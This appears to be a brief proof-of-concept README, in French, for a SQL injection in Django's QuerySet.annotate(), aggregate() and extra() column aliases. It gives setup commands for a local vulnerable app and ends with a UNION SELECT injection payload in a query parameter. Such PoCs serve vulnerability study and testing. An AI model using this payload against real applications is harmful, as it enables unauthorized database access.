
Un problème a été découvert dans Django 2.2 avant 2.2.28, 3.2 avant 3.2.13 et 4.0 avant 4.0.4. Les méthodes QuerySet.annotate(), aggregate() et extra() sont sujettes à une injection SQL dans les alias de colonnes via un dictionnaire contrefait (avec expansion de dictionnaire) comme **kwargs passé.
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
